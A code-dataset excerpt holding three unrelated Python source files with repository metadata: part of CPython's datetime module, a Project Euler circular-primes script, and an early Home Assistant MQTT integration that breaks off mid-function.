if isinstance(year, bytes) and len(year) == 10 and 1 <= year[2] <= 12:
# Pickle support
self = object.__new__(cls)
self.__setstate(year, month)
self._hashcode = -1
return self
year, month, day = _check_date_fields(year, month, day)
hour, minute, second, microsecond = _check_time_fields(
hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
self._hashcode = -1
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
@classmethod
def _fromtimestamp(cls, t, utc, tz):
"""Construct a datetime from a POSIX timestamp (like time.time()).
A timezone info object may be passed in as well.
"""
frac, t = _math.modf(t)
us = round(frac * 1e6)
if us >= 1000000:
t += 1
us -= 1000000
elif us < 0:
t -= 1
us += 1000000
converter = _time.gmtime if utc else _time.localtime
y, m, d, hh, mm, ss, weekday, jday, dst = converter(t)
ss = min(ss, 59) # clamp out leap seconds if the platform has them
return cls(y, m, d, hh, mm, ss, us, tz)
@classmethod
def fromtimestamp(cls, t, tz=None):
"""Construct a datetime from a POSIX timestamp (like time.time()).
A timezone info object may be passed in as well.
"""
_check_tzinfo_arg(tz)
result = cls._fromtimestamp(t, tz is not None, tz)
if tz is not None:
result = tz.fromutc(result)
return result
@classmethod
def utcfromtimestamp(cls, t):
"""Construct a naive UTC datetime from a POSIX timestamp."""
return cls._fromtimestamp(t, True, None)
@classmethod
def now(cls, tz=None):
"Construct a datetime from time.time() and optional time zone info."
t = _time.time()
return cls.fromtimestamp(t, tz)
@classmethod
def utcnow(cls):
"Construct a UTC datetime from time.time()."
t = _time.time()
return cls.utcfromtimestamp(t)
@classmethod
def combine(cls, date, time):
"Construct a datetime from a given date and a given time."
if not isinstance(date, _date_class):
raise TypeError("date argument must be a date instance")
if not isinstance(time, _time_class):
raise TypeError("time argument must be a time instance")
return cls(date.year, date.month, date.day,
time.hour, time.minute, time.second, time.microsecond,
time.tzinfo)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
dst = self.dst()
if dst is None:
dst = -1
elif dst:
dst = 1
else:
dst = 0
return _build_struct_time(self.year, self.month, self.day,
self.hour, self.minute, self.second,
dst)
def timestamp(self):
"Return POSIX timestamp as float"
if self._tzinfo is None:
return _time.mktime((self.year, self.month, self.day,
self.hour, self.minute, self.second,
-1, -1, -1)) + self.microsecond / 1e6
else:
return (self - _EPOCH).total_seconds()
def utctimetuple(self):
"Return UTC time tuple compatible with time.gmtime()."
offset = self.utcoffset()
if offset:
self -= offset
y, m, d = self.year, self.month, self.day
hh, mm, ss = self.hour, self.minute, self.second
return _build_struct_time(y, m, d, hh, mm, ss, 0)
def date(self):
"Return the date part."
return date(self._year, self._month, self._day)
def time(self):
"Return the time part, with tzinfo None."
return time(self.hour, self.minute, self.second, self.microsecond)
def timetz(self):
"Return the time part, with same tzinfo."
return time(self.hour, self.minute, self.second, self.microsecond,
self._tzinfo)
def replace(self, year=None, month=None, day=None, hour=None,
minute=None, second=None, microsecond=None, tzinfo=True):
"""Return a new datetime with new values for the specified fields."""
if year is None:
year = self.year
if month is None:
month = self.month
if day is None:
day = self.day
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
return datetime(year, month, day, hour, minute, second, microsecond,
tzinfo)
def astimezone(self, tz=None):
if tz is None:
if self.tzinfo is None:
raise ValueError("astimezone() requires an aware datetime")
ts = (self - _EPOCH) // timedelta(seconds=1)
localtm = _time.localtime(ts)
local = datetime(*localtm[:6])
try:
# Extract TZ data if available
gmtoff = localtm.tm_gmtoff
zone = localtm.tm_zone
except AttributeError:
# Compute UTC offset and compare with the value implied
# by tm_isdst. If the values match, use the zone name
# implied by tm_isdst.
delta = local - datetime(*_time.gmtime(ts)[:6])
dst = _time.daylight and localtm.tm_isdst > 0
gmtoff = -(_time.altzone if dst else _time.timezone)
if delta == timedelta(seconds=gmtoff):
tz = timezone(delta, _time.tzname[dst])
else:
tz = timezone(delta)
else:
tz = timezone(timedelta(seconds=gmtoff), zone)
elif not isinstance(tz, tzinfo):
raise TypeError("tz argument must be an instance of tzinfo")
mytz = self.tzinfo
if mytz is None:
raise ValueError("astimezone() requires an aware datetime")
if tz is mytz:
return self
# Convert self to UTC, and attach the new time zone object.
myoffset = self.utcoffset()
if myoffset is None:
raise ValueError("astimezone() requires an aware datetime")
utc = (self - myoffset).replace(tzinfo=tz)
# Convert from UTC to tz's local time.
return tz.fromutc(utc)
# Ways to produce a string.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d %02d:%02d:%02d %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day,
self._hour, self._minute, self._second,
self._year)
def isoformat(self, sep='T'):
"""Return the time formatted according to ISO.
This is 'YYYY-MM-DD HH:MM:SS.mmmmmm', or 'YYYY-MM-DD HH:MM:SS' if
self.microsecond == 0.
If self.tzinfo is not None, the UTC offset is also attached, giving
'YYYY-MM-DD HH:MM:SS.mmmmmm+HH:MM' or 'YYYY-MM-DD HH:MM:SS+HH:MM'.
Optional argument sep specifies the separator between date and
time, default 'T'.
"""
s = ("%04d-%02d-%02d%c" % (self._year, self._month, self._day, sep) +
_format_time(self._hour, self._minute, self._second,
self._microsecond))
off = self.utcoffset()
if off is not None:
if off.days < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, timedelta(hours=1))
assert not mm % timedelta(minutes=1), "whole minute"
mm //= timedelta(minutes=1)
s += "%s%02d:%02d" % (sign, hh, mm)
return s
def __repr__(self):
"""Convert to formal string, for repr()."""
L = [self._year, self._month, self._day, # These are never zero
self._hour, self._minute, self._second, self._microsecond]
if L[-1] == 0:
del L[-1]
if L[-1] == 0:
del L[-1]
s = "%s.%s(%s)" % (self.__class__.__module__,
self.__class__.__qualname__,
", ".join(map(str, L)))
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def __str__(self):
"Convert to string, for str()."
return self.isoformat(sep=' ')
@classmethod
def strptime(cls, date_string, format):
'string, format -> new datetime parsed from a string (like time.strptime()).'
import _strptime
return _strptime._strptime_datetime(cls, date_string, format)
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(self)
_check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(self)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(self)
_check_utc_offset("dst", offset)
return offset
# Comparisons of datetime objects with other.
def __eq__(self, other):
if isinstance(other, datetime):
return self._cmp(other, allow_mixed=True) == 0
elif not isinstance(other, date):
return NotImplemented
else:
return False
def __le__(self, other):
if isinstance(other, datetime):
return self._cmp(other) <= 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) < 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, datetime):
return self._cmp(other) >= 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, datetime):
return self._cmp(other) > 0
elif not isinstance(other, date):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other, allow_mixed=False):
assert isinstance(other, datetime)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self.utcoffset()
otoff = other.utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._year, self._month, self._day,
self._hour, self._minute, self._second,
self._microsecond),
(other._year, other._month, other._day,
other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
if allow_mixed:
return 2 # arbitrary non-zero value
else:
raise TypeError("cannot compare naive and aware datetimes")
# XXX What follows could be done more efficiently...
diff = self - other # this will take offsets into account
if diff.days < 0:
return -1
return diff and 1 or 0
def __add__(self, other):
"Add a datetime and a timedelta."
if not isinstance(other, timedelta):
return NotImplemented
delta = timedelta(self.toordinal(),
hours=self._hour,
minutes=self._minute,
seconds=self._second,
microseconds=self._microsecond)
delta += other
hour, rem = divmod(delta.seconds, 3600)
minute, second = divmod(rem, 60)
if 0 < delta.days <= _MAXORDINAL:
return datetime.combine(date.fromordinal(delta.days),
time(hour, minute, second,
delta.microseconds,
tzinfo=self._tzinfo))
raise OverflowError("result out of range")
__radd__ = __add__
def __sub__(self, other):
"Subtract two datetimes, or a datetime and a timedelta."
if not isinstance(other, datetime):
if isinstance(other, timedelta):
return self + -other
return NotImplemented
days1 = self.toordinal()
days2 = other.toordinal()
secs1 = self._second + self._minute * 60 + self._hour * 3600
secs2 = other._second + other._minute * 60 + other._hour * 3600
base = timedelta(days1 - days2,
secs1 - secs2,
self._microsecond - other._microsecond)
if self._tzinfo is other._tzinfo:
return base
myoff = self.utcoffset()
otoff = other.utcoffset()
if myoff == otoff:
return base
if myoff is None or otoff is None:
raise TypeError("cannot mix naive and timezone-aware time")
return base + otoff - myoff
def __hash__(self):
if self._hashcode == -1:
tzoff = self.utcoffset()
if tzoff is None:
self._hashcode = hash(self._getstate()[0])
else:
days = _ymd2ord(self.year, self.month, self.day)
seconds = self.hour * 3600 + self.minute * 60 + self.second
self._hashcode = hash(timedelta(days, seconds, self.microsecond) - tzoff)
return self._hashcode
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = bytes([yhi, ylo, self._month, self._day,
self._hour, self._minute, self._second,
us1, us2, us3])
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
(yhi, ylo, self._month, self._day, self._hour,
self._minute, self._second, us1, us2, us3) = string
self._year = yhi * 256 + ylo
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (self.__class__, self._getstate())
datetime.min = datetime(1, 1, 1)
datetime.max = datetime(9999, 12, 31, 23, 59, 59, 999999)
datetime.resolution = timedelta(microseconds=1)
def _isoweek1monday(year):
# Helper to calculate the day number of the Monday starting week 1
# XXX This could be done more efficiently
THURSDAY = 3
firstday = _ymd2ord(year, 1, 1)
firstweekday = (firstday + 6) % 7 # See weekday() above
week1monday = firstday - firstweekday
if firstweekday > THURSDAY:
week1monday += 7
return week1monday
class timezone(tzinfo):
__slots__ = '_offset', '_name'
# Sentinel value to disallow None
_Omitted = object()
def __new__(cls, offset, name=_Omitted):
if not isinstance(offset, timedelta):
raise TypeError("offset must be a timedelta")
if name is cls._Omitted:
if not offset:
return cls.utc
name = None
elif not isinstance(name, str):
raise TypeError("name must be a string")
if not cls._minoffset <= offset <= cls._maxoffset:
raise ValueError("offset must be a timedelta "
"strictly between -timedelta(hours=24) and "
"timedelta(hours=24).")
if (offset.microseconds != 0 or offset.seconds % 60 != 0):
raise ValueError("offset must be a timedelta "
"representing a whole number of minutes")
return cls._create(offset, name)
@classmethod
def _create(cls, offset, name=None):
self = tzinfo.__new__(cls)
self._offset = offset
self._name = name
return self
def __getinitargs__(self):
"""pickle support"""
if self._name is None:
return (self._offset,)
return (self._offset, self._name)
def __eq__(self, other):
if type(other) != timezone:
return False
return self._offset == other._offset
def __hash__(self):
return hash(self._offset)
def __repr__(self):
"""Convert to formal string, for repr().
>>> tz = timezone.utc
>>> repr(tz)
'datetime.timezone.utc'
>>> tz = timezone(timedelta(hours=-5), 'EST')
>>> repr(tz)
"datetime.timezone(datetime.timedelta(-1, 68400), 'EST')"
"""
if self is self.utc:
return 'datetime.timezone.utc'
if self._name is None:
return "%s.%s(%r)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._offset)
return "%s.%s(%r, %r)" % (self.__class__.__module__,
self.__class__.__qualname__,
self._offset, self._name)
def __str__(self):
return self.tzname(None)
def utcoffset(self, dt):
if isinstance(dt, datetime) or dt is None:
return self._offset
raise TypeError("utcoffset() argument must be a datetime instance"
" or None")
def tzname(self, dt):
if isinstance(dt, datetime) or dt is None:
if self._name is None:
return self._name_from_offset(self._offset)
return self._name
raise TypeError("tzname() argument must be a datetime instance"
" or None")
def dst(self, dt):
if isinstance(dt, datetime) or dt is None:
return None
raise TypeError("dst() argument must be a datetime instance"
" or None")
def fromutc(self, dt):
if isinstance(dt, datetime):
if dt.tzinfo is not self:
raise ValueError("fromutc: dt.tzinfo "
"is not self")
return dt + self._offset
raise TypeError("fromutc() argument must be a datetime instance"
" or None")
_maxoffset = timedelta(hours=23, minutes=59)
_minoffset = -_maxoffset
@staticmethod
def _name_from_offset(delta):
if delta < timedelta(0):
sign = '-'
delta = -delta
else:
sign = '+'
hours, rest = divmod(delta, timedelta(hours=1))
minutes = rest // timedelta(minutes=1)
return 'UTC{}{:02d}:{:02d}'.format(sign, hours, minutes)
timezone.utc = timezone._create(timedelta(0))
timezone.min = timezone._create(timezone._minoffset)
timezone.max = timezone._create(timezone._maxoffset)
_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Some time zone algebra. For a datetime x, let
# x.n = x stripped of its timezone -- its naive time.
# x.o = x.utcoffset(), and assuming that doesn't raise an exception or
# return None
# x.d = x.dst(), and assuming that doesn't raise an exception or
# return None
# x.s = x's standard offset, x.o - x.d
#
# Now some derived rules, where k is a duration (timedelta).
#
# 1. x.o = x.s + x.d
# This follows from the definition of x.s.
#
# 2. If x and y have the same tzinfo member, x.s = y.s.
# This is actually a requirement, an assumption we need to make about
# sane tzinfo classes.
#
# 3. The naive UTC time corresponding to x is x.n - x.o.
# This is again a requirement for a sane tzinfo class.
#
# 4. (x+k).s = x.s
# This follows from #2, and that datimetimetz+timedelta preserves tzinfo.
#
# 5. (x+k).n = x.n + k
# Again follows from how arithmetic is defined.
#
# Now we can explain tz.fromutc(x). Let's assume it's an interesting case
# (meaning that the various tzinfo methods exist, and don't blow up or return
# None when called).
#
# The function wants to return a datetime y with timezone tz, equivalent to x.
# x is already in UTC.
#
# By #3, we want
#
# y.n - y.o = x.n [1]
#
# The algorithm starts by attaching tz to x.n, and calling that y. So
# x.n = y.n at the start. Then it wants to add a duration k to y, so that [1]
# becomes true; in effect, we want to solve [2] for k:
#
# (y+k).n - (y+k).o = x.n [2]
#
# By #1, this is the same as
#
# (y+k).n - ((y+k).s + (y+k).d) = x.n [3]
#
# By #5, (y+k).n = y.n + k, which equals x.n + k because x.n=y.n at the start.
# Substituting that into [3],
#
# x.n + k - (y+k).s - (y+k).d = x.n; the x.n terms cancel, leaving
# k - (y+k).s - (y+k).d = 0; rearranging,
# k = (y+k).s - (y+k).d; by #4, (y+k).s == y.s, so
# k = y.s - (y+k).d
#
# On the RHS, (y+k).d can't be computed directly, but y.s can be, and we
# approximate k by ignoring the (y+k).d term at first. Note that k can't be
# very large, since all offset-returning methods return a duration of magnitude
# less than 24 hours. For that reason, if y is firmly in std time, (y+k).d must
# be 0, so ignoring it has no consequence then.
#
# In any case, the new value is
#
# z = y + y.s [4]
#
# It's helpful to step back at look at [4] from a higher level: it's simply
# mapping from UTC to tz's standard time.
#
# At this point, if
#
# z.n - z.o = x.n [5]
#
# we have an equivalent time, and are almost done. The insecurity here is
# at the start of daylight time. Picture US Eastern for concreteness. The wall
# time jumps from 1:59 to 3:00, and wall hours of the form 2:MM don't make good
# sense then. The docs ask that an Eastern tzinfo class consider such a time to
# be EDT (because it's "after 2"), which is a redundant spelling of 1:MM EST
# on the day DST starts. We want to return the 1:MM EST spelling because that's
# the only spelling that makes sense on the local wall clock.
#
# In fact, if [5] holds at this point, we do have the standard-time spelling,
# but that takes a bit of proof. We first prove a stronger result. What's the
# difference between the LHS and RHS of [5]? Let
#
# diff = x.n - (z.n - z.o) [6]
#
# Now
# z.n = by [4]
# (y + y.s).n = by #5
# y.n + y.s = since y.n = x.n
# x.n + y.s = since z and y are have the same tzinfo member,
# y.s = z.s by #2
# x.n + z.s
#
# Plugging that back into [6] gives
#
# diff =
# x.n - ((x.n + z.s) - z.o) = expanding
# x.n - x.n - z.s + z.o = cancelling
# - z.s + z.o = by #2
# z.d
#
# So diff = z.d.
#
# If [5] is true now, diff = 0, so z.d = 0 too, and we have the standard-time
# spelling we wanted in the endcase described above. We're done. Contrarily,
# if z.d = 0, then we have a UTC equivalent, and are also done.
#
# If [5] is not true now, diff = z.d != 0, and z.d is the offset we need to
# add to z (in effect, z is in tz's standard time, and we need to shift the
# local clock into tz's daylight time).
#
# Let
#
# z' = z + z.d = z + diff [7]
#
# and we can again ask whether
#
# z'.n - z'.o = x.n [8]
#
# If so, we're done. If not, the tzinfo class is insane, according to the
# assumptions we've made. This also requires a bit of proof. As before, let's
# compute the difference between the LHS and RHS of [8] (and skipping some of
# the justifications for the kinds of substitutions we've done several times
# already):
#
# diff' = x.n - (z'.n - z'.o) = replacing z'.n via [7]
# x.n - (z.n + diff - z'.o) = replacing diff via [6]
# x.n - (z.n + x.n - (z.n - z.o) - z'.o) =
# x.n - z.n - x.n + z.n - z.o + z'.o = cancel x.n
# - z.n + z.n - z.o + z'.o = cancel z.n
# - z.o + z'.o = #1 twice
# -z.s - z.d + z'.s + z'.d = z and z' have same tzinfo
# z'.d - z.d
#
# So z' is UTC-equivalent to x iff z'.d = z.d at this point. If they are equal,
# we've found the UTC-equivalent so are done. In fact, we stop with [7] and
# return z', not bothering to compute z'.d.
#
# How could z.d and z'd differ? z' = z + z.d [7], so merely moving z' by
# a dst() offset, and starting *from* a time already in DST (we know z.d != 0),
# would have to change the result dst() returns: we start in DST, and moving
# a little further into it takes us out of DST.
#
# There isn't a sane case where this can happen. The closest it gets is at
# the end of DST, where there's an hour in UTC with no spelling in a hybrid
# tzinfo class. In US Eastern, that's 5:MM UTC = 0:MM EST = 1:MM EDT. During
# that hour, on an Eastern clock 1:MM is taken as being in standard time (6:MM
# UTC) because the docs insist on that, but 0:MM is taken as being in daylight
# time (4:MM UTC). There is no local time mapping to 5:MM UTC. The local
# clock jumps from 1:59 back to 1:00 again, and repeats the 1:MM hour in
# standard time. Since that's what the local clock *does*, we want to map both
# UTC hours 5:MM and 6:MM to 1:MM Eastern. The result is ambiguous
# in local time, but so it goes -- it's the way the local clock works.
#
# When x = 5:MM UTC is the input to this algorithm, x.o=0, y.o=-5 and y.d=0,
# so z=0:MM. z.d=60 (minutes) then, so [5] doesn't hold and we keep going.
# z' = z + z.d = 1:MM then, and z'.d=0, and z'.d - z.d = -60 != 0 so [8]
# (correctly) concludes that z' is not UTC-equivalent to x.
#
# Because we know z.d said z was in daylight time (else [5] would have held and
# we would have stopped then), and we know z.d != z'.d (else [8] would have held
# and we have stopped then), and there are only 2 possible values dst() can
# return in Eastern, it follows that z'.d must be 0 (which it is in the example,
# but the reasoning doesn't depend on the example -- it depends on there being
# two possible dst() outcomes, one zero and the other non-zero). Therefore
# z' must be in standard time, and is the spelling we want in this case.
#
# Note again that z' is not UTC-equivalent as far as the hybrid tzinfo class is
# concerned (because it takes z' as being in standard time rather than the
# daylight time we intend here), but returning it gives the real-life "local
# clock repeats an hour" behavior when mapping the "unspellable" UTC hour into
# tz.
#
# When the input is 6:MM, z=1:MM and z.d=0, and we stop at once, again with
# the 1:MM standard time spelling we want.
#
# So how can this break? One of the assumptions must be violated. Two
# possibilities:
#
# 1) [2] effectively says that y.s is invariant across all y belong to a given
# time zone. This isn't true if, for political reasons or continental drift,
# a region decides to change its base offset from UTC.
#
# 2) There may be versions of "double daylight" time where the tail end of
# the analysis gives up a step too early. I haven't thought about that
# enough to say.
#
# In any case, it's clear that the default fromutc() is strong enough to handle
# "almost all" time zones: so long as the standard offset is invariant, it
# doesn't matter if daylight time transition points change from year to year, or
# if daylight time is skipped in some years; it doesn't matter how large or
# small dst() may get within its bounds; and it doesn't even matter if some
# perverse time zone returns a negative dst()). So a breaking case must be
# pretty bizarre, and a tzinfo subclass can override fromutc() if it is.
try:
from _datetime import *
except ImportError:
pass
else:
# Clean up unused names
del (_DAYNAMES, _DAYS_BEFORE_MONTH, _DAYS_IN_MONTH, _DI100Y, _DI400Y,
_DI4Y, _EPOCH, _MAXORDINAL, _MONTHNAMES, _build_struct_time,
_check_date_fields, _check_int_field, _check_time_fields,
_check_tzinfo_arg, _check_tzname, _check_utc_offset, _cmp, _cmperror,
_date_class, _days_before_month, _days_before_year, _days_in_month,
_format_time, _is_leap, _isoweek1monday, _math, _ord2ymd,
_time, _time_class, _tzinfo_class, _wrap_strftime, _ymd2ord)
# XXX Since import * above excludes names that start with _,
# docstring does not get overwritten. In the future, it may be
# appropriate to maintain a single module level docstring and
# remove the following line.
from _datetime import __doc__
|
bgris/ODL_bgris
|
lib/python3.5/datetime.py
|
Python
|
gpl-3.0
| 75,899 | 0.000751 |
from math import sqrt
def is_prime(x):
for i in xrange(2, int(sqrt(x) + 1)):
if x % i == 0:
return False
return True
def rotate(v):
res = []
u = str(v)
while True:
u = u[1:] + u[0]
w = int(u)
if w == v:
break
res.append(w)
return res
MILLION = 1000000
primes = filter(is_prime, range(2, MILLION))
s = set(primes)
ans = 0
for item in primes:
flag = True
print item
for y in rotate(item):
if y not in s:
flag = False
if flag:
ans += 1
print ans
|
neutronest/eulerproject-douby
|
e35/35.py
|
Python
|
mit
| 586 | 0.006826 |
"""
homeassistant.components.mqtt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MQTT component, using paho-mqtt.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/mqtt/
"""
import json
import logging
import os
import socket
import time
from homeassistant.exceptions import HomeAssistantError
import homeassistant.util as util
from homeassistant.helpers import validate_config
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP)
_LOGGER = logging.getLogger(__name__)
DOMAIN = "mqtt"
MQTT_CLIENT = None
DEFAULT_PORT = 1883
DEFAULT_KEEPALIVE = 60
DEFAULT_QOS = 0
SERVICE_PUBLISH = 'publish'
EVENT_MQTT_MESSAGE_RECEIVED = 'MQTT_MESSAGE_RECEIVED'
DEPENDENCIES = []
REQUIREMENTS = ['paho-mqtt==1.1', 'jsonpath-rw==1.4.0']
CONF_BROKER = 'broker'
CONF_PORT = 'port'
CONF_CLIENT_ID = 'client_id'
CONF_KEEPALIVE = 'keepalive'
CONF_USERNAME = 'username'
CONF_PASSWORD = 'password'
CONF_CERTIFICATE = 'certificate'
ATTR_TOPIC = 'topic'
ATTR_PAYLOAD = 'payload'
ATTR_QOS = 'qos'
MAX_RECONNECT_WAIT = 300 # seconds
def publish(hass, topic, payload, qos=None):
""" Send an MQTT message. """
data = {
ATTR_TOPIC: topic,
ATTR_PAYLOAD: payload,
}
if qos is not None:
data[ATTR_QOS] = qos
hass.services.call(DOMAIN, SERVICE_PUBLISH, data)
def subscribe(hass, topic, callback, qos=DEFAULT_QOS):
""" Subscribe to a topic. """
def mqtt_topic_subscriber(event):
""" Match subscribed MQTT topic. """
if _match_topic(topic, event.data[ATTR_TOPIC]):
callback(event.data[ATTR_TOPIC], event.data[ATTR_PAYLOAD],
event.data[ATTR_QOS])
hass.bus.listen(EVENT_MQTT_MESSAGE_RECEIVED, mqtt_topic_subscriber)
MQTT_CLIENT.subscribe(topic, qos)
def setup(hass, config):
""" Get the MQTT protocol service. """
if not validate_config(config, {DOMAIN: ['broker']}, _LOGGER):
return False
conf = config[DOMAIN]
broker = conf[CONF_BROKER]
port = util.convert(conf.get(CONF_PORT), int, DEFAULT_PORT)
client_id = util.convert(conf.get(CONF_CLIENT_ID), str)
keepalive = util.convert(conf.get(CONF_KEEPALIVE), int, DEFAULT_KEEPALIVE)
username = util.convert(conf.get(CONF_USERNAME), str)
password = util.convert(conf.get(CONF_PASSWORD), str)
certificate = util.convert(conf.get(CONF_CERTIFICATE), str)
# For cloudmqtt.com, secured connection, auto fill in certificate
if certificate is None and 19999 < port < 30000 and \
broker.endswith('.cloudmqtt.com'):
certificate = os.path.join(os.path.dirname(__file__),
'addtrustexternalcaroot.crt')
global MQTT_CLIENT
try:
MQTT_CLIENT = MQTT(hass, broker, port, client_id, keepalive, username,
password, certificate)
except socket.error:
_LOGGER.exception("Can't connect to the broker. "
"Please check your settings and the broker "
"itself.")
return False
def stop_mqtt(event):
""" Stop MQTT component. """
MQTT_CLIENT.stop()
def start_mqtt(event):
""" Launch MQTT component when Home Assistant starts up. """
MQTT_CLIENT.start()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_mqtt)
def publish_service(call):
""" Handle MQTT publish service calls. """
msg_topic = call.data.get(ATTR_TOPIC)
payload = call.data.get(ATTR_PAYLOAD)
qos = call.data.get(ATTR_QOS, DEFAULT_QOS)
if msg_topic is None or payload is None:
return
MQTT_CLIENT.publish(msg_topic, payload, qos)
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, start_mqtt)
hass.services.register(DOMAIN, SERVICE_PUBLISH, publish_service)
return True
# pylint: disable=too-few-public-methods
class _JsonFmtParser(object):
""" Implements a json parser on xpath. """
def __init__(self, jsonpath):
import jsonpath_rw
self._expr = jsonpath_rw.parse(jsonpath)
def __call__(self, payload):
match = self._expr.find(json.loads(payload))
return match[0].value if len(match) > 0 else payload
# pylint: disable=too-few-public-methods
class FmtParser(object):
""" Wrapper for all supported formats. """
def __init__(self, fmt):
self._parse = lambda x: x
if fmt:
if fmt.startswith('json:'):
self._parse = _JsonFmtParser(fmt[5:])
def __call__(self, payload):
return self._parse(payload)
# This is based on one of the paho-mqtt examples:
# http://git.eclipse.org/c/paho/org.eclipse.paho.mqtt.python.git/tree/examples/sub-class.py
# pylint: disable=too-many-arguments
class MQTT(object):
""" Implements messaging service for MQTT. """
def __init__(self, hass, broker, port, client_id, keepalive, username,
password, certificate):
import paho.mqtt.client as mqtt
self.userdata = {
'hass': hass,
'topics': {},
'progress': {},
}
if client_id is None:
self._mqttc = mqtt.Client()
else:
self._mqttc = mqtt.Client(client_id)
self._mqttc.user_data_set(self.userdata)
if username is not None:
self._mqttc.username_pw_set(username, password)
if certificate is not None:
self._mqttc.tls_set(certificate)
self._mqttc.on_subscribe = _mqtt_on_subscribe
self._mqttc.on_unsubscribe = _mqtt_on_unsubscribe
self._mqttc.on_connect = _mqtt_on_connect
self._mqttc.on_disconnect = _mqtt_on_disconnect
self._mqttc.on_message = _mqtt_on_message
self._mqttc.connect(broker, port, keepalive)
def publish(self, topic, payload, qos):
""" Publish a MQTT message. """
self._mqttc.publish(topic, payload, qos)
def start(self):
""" Run the MQTT client. """
self._mqttc.loop_start()
def stop(self):
""" Stop the MQTT client. """
self._mqttc.loop_stop()
def subscribe(self, topic, qos):
""" Subscribe to a topic. """
if topic in self.userdata['topics']:
return
result, mid = self._mqttc.subscribe(topic, qos)
_raise_on_error(result)
self.userdata['progress'][mid] = topic
self.userdata['topics'][topic] = None
def unsubscribe(self, topic):
""" Unsubscribe from topic. """
result, mid = self._mqttc.unsubscribe(topic)
_raise_on_error(result)
self.userdata['progress'][mid] = topic
def _mqtt_on_message(mqttc, userdata, msg):
""" Message callback """
userdata['hass'].bus.fire(EVENT_MQTT_MESSAGE_RECEIVED, {
ATTR_TOPIC: msg.topic,
ATTR_QOS: msg.qos,
ATTR_PAYLOAD: msg.payload.decode('utf-8'),
})
def _mqtt_on_connect(mqttc, userdata, flags, result_code):
""" On connect, resubscribe to all topics we were subscribed to. """
if result_code != 0:
_LOGGER.error('Unable to connect to the MQTT broker: %s', {
1: 'Incorrect protocol version',
2: 'Invalid client identifier',
3: 'Server unavailable',
4: 'Bad username or password',
5: 'Not authorised'
}.get(result_code, 'Unknown reason'))
mqttc.disconnect()
return
old_topics = userdata['topics']
userdata['topics'] = {}
userdata['progress'] = {}
for topic, qos in old_topics.items():
# qos is None if we were in process of subscribing
if qos is not None:
mqttc.subscribe(topic, qos)
def _mqtt_on_subscribe(mqttc, userdata, mid, granted_qos):
""" Called when subscribe successful. """
topic = userdata['progress'].pop(mid, None)
if topic is None:
return
userdata['topics'][topic] = granted_qos
def _mqtt_on_unsubscribe(mqttc, userdata, mid, granted_qos):
""" Called when subscribe successful. """
topic = userdata['progress'].pop(mid, None)
if topic is None:
return
userdata['topics'].pop(topic, None)
def _mqtt_on_disconnect(mqttc, userdata, result_code):
""" Called when being disconnected. """
# When disconnected because of calling disconnect()
if result_code == 0:
return
tries = 0
wait_time = 0
while True:
try:
if mqttc.reconnect() == 0:
_LOGGER.info('Successfully reconnected to the MQTT server')
break
except socket.error:
pass
wait_time = min(2**tries, MAX_RECONNECT_WAIT)
_LOGGER.warning(
'Disconnected from MQTT (%s). Trying to reconnect in %ss',
result_code, wait_time)
# It is ok to sleep here as we are in the MQTT thread.
time.sleep(wait_time)
tries += 1
def _raise_on_error(result):
""" Raise error if error result. """
if result != 0:
